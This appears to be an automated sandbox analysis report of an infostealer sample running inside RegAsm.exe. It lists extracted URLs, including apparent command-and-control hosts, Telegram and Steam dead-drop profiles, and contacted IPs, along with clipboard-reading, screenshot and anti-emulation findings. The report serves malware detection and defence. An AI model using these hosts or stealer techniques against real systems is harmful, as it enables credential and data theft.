Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://ocsp.entrust.net03
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000567000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.000000000044C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://stadiatechnologies.com
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://stadiatechnologies.com/
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://stadiatechnologies.com/P_
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000567000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.000000000044C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://stadiatechnologies.comntent-Disposition:
Source: Amcache.hve.33.dr	String found in binary or memory: http://upx.sf.net
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, HDAFIIDAKJ.exe.29.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://www.entrust.net/rpa03
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.1426905335.000000006CBBD000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.3.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000003.00000002.1426312746.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1399562953.000000001B63E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943907695.000000002450D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.29.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: BAAEHD.29.dr, AECFCAAE.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp, JKFIDG.29.dr, KJJJKFIIIJJJECAAEHDB.3.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp, JKFIDG.29.dr, KJJJKFIIIJJJECAAEHDB.3.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: BAAEHD.29.dr, AECFCAAE.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BAAEHD.29.dr, AECFCAAE.3.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BAAEHD.29.dr, AECFCAAE.3.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000029.00000002.1938989194.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://condedqpwqm.shop/T
Source: RegAsm.exe, 00000018.00000002.1483311475.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://condedqpwqm.shop/api
Source: RegAsm.exe, 00000029.00000002.1938989194.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://condedqpwqm.shop/api.
Source: RegAsm.exe, 00000018.00000002.1483311475.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://condedqpwqm.shop/api45
Source: RegAsm.exe, 00000018.00000002.1483311475.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://condedqpwqm.shop/apip
Source: RegAsm.exe, 00000018.00000002.1483311475.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://condedqpwqm.shop/apitK
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp, JKFIDG.29.dr, KJJJKFIIIJJJECAAEHDB.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp, JKFIDG.29.dr, KJJJKFIIIJJJECAAEHDB.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: BAAEHD.29.dr, AECFCAAE.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BAAEHD.29.dr, AECFCAAE.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BAAEHD.29.dr, AECFCAAE.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: KJJJKFIIIJJJECAAEHDB.3.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: https://mozilla.org0/
Source: userIEHDAFHDHC.exe, 0000001B.00000002.1383374725.00000000038B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199761128941
Source: IJKJJK.29.dr	String found in binary or memory: https://support.mozilla.org
Source: IJKJJK.29.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: IJKJJK.29.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/(
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/9
Source: userIEHDAFHDHC.exe, 0000001B.00000002.1383374725.00000000038B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/iyigunl
Source: userIEHDAFHDHC.exe, 0000001B.00000002.1383374725.00000000038B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/iyigunlsql.dllsqlr.dllIn
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.000000000044C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2206607255.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2205091531.000000000045A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/jamelwt
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/jamelwt#cp
Source: userIEHDAFHDHC.exe, 0000001B.00000002.1383374725.00000000038B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/jamelwtkwnvfdhttps://steamcommunity.com/profiles/76561199761128941b
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/nLbZ
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp, JKFIDG.29.dr, KJJJKFIIIJJJECAAEHDB.3.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: RegAsm.exe, 00000029.00000002.1938989194.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: RegAsm.exe, 00000029.00000002.1938989194.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: BAAEHD.29.dr, AECFCAAE.3.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: https://www.entrust.net/rpa0
Source: BAAEHD.29.dr, AECFCAAE.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp, JKFIDG.29.dr, KJJJKFIIIJJJECAAEHDB.3.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: IJKJJK.29.dr	String found in binary or memory: https://www.mozilla.org
Source: RegAsm.exe, 00000003.00000002.1382432761.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1936827906.000000001E0AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: IJKJJK.29.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: RegAsm.exe, 00000003.00000002.1382432761.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1936827906.000000001E0AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: IJKJJK.29.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: RegAsm.exe, 00000003.00000002.1382432761.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1936827906.000000001E0AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/chost.exe
Source: GIJEGDAKEHJECAKEGDHJDHDAFH.3.dr, IJKJJK.29.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: IJKJJK.29.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RegAsm.exe, 00000003.00000002.1382432761.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1936827906.000000001E0AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/YSAESCTrC.exe
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: GIJEGDAKEHJECAKEGDHJDHDAFH.3.dr, IJKJJK.29.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.7:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.7:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.7:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49740 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 24_2_00431530 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

24_2_00431530

Contains functionality to read the clipboard data

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 24_2_00431530 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

24_2_00431530

Contains functionality to record screenshots

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00418AB0 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

3_2_00418AB0

System Summary

Malicious sample detected (through community Yara rule)

Source: 29.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 29.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 27.2.userIEHDAFHDHC.exe.38b5570.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 27.2.userIEHDAFHDHC.exe.38b5570.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: Process Memory Space: userIEHDAFHDHC.exe PID: 7444, type: MEMORYSTR	Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth

.NET source code contains very large array initializations

Source: file.exe, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 192000
Source: userFBKFCFBFID.exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 308224
Source: 66cf818156193_ldjfnsfd[1].exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 308224
Source: userIEHDAFHDHC.exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 176128
Source: 66cf75d3791d7_vrewqgq[1].exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 176128
Source: DHCGHDHIDH.exe.29.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 308224
Source: HDAFIIDAKJ.exe.29.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 176128

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBAB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6CBAB700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBAB8C0 rand_s,NtQueryVirtualMemory,	3_2_6CBAB8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBAB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	3_2_6CBAB910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB4F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6CB4F280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA1B8C0 NtQueryVirtualMemory,	29_2_6CA1B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA1B910 NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlRestoreLastWin32Error,GetLastError,	29_2_6CA1B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA1B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlRestoreLastWin32Error,	29_2_6CA1B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6C9BF280 NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlRestoreLastWin32Error,	29_2_6C9BF280

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01740B20	0_2_01740B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB435A0	3_2_6CB435A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBA34A0	3_2_6CBA34A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBAC4A0	3_2_6CBAC4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB56C80	3_2_6CB56C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB86CF0	3_2_6CB86CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB4D4E0	3_2_6CB4D4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB6D4D0	3_2_6CB6D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB564C0	3_2_6CB564C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBB542B	3_2_6CBB542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB85C10	3_2_6CB85C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB92C10	3_2_6CB92C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBBAC00	3_2_6CBBAC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBB545C	3_2_6CBB545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB55440	3_2_6CB55440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBA85F0	3_2_6CBA85F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB80DD0	3_2_6CB80DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB70512	3_2_6CB70512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB6ED10	3_2_6CB6ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB5FD00	3_2_6CB5FD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBA4EA0	3_2_6CBA4EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB65E90	3_2_6CB65E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBAE680	3_2_6CBAE680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB4BEF0	3_2_6CB4BEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB5FEF0	3_2_6CB5FEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBB76E3	3_2_6CBB76E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBA9E30	3_2_6CBA9E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB87E10	3_2_6CB87E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB95600	3_2_6CB95600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB4C670	3_2_6CB4C670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBB6E63	3_2_6CBB6E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB69E50	3_2_6CB69E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB83E50	3_2_6CB83E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB64640	3_2_6CB64640
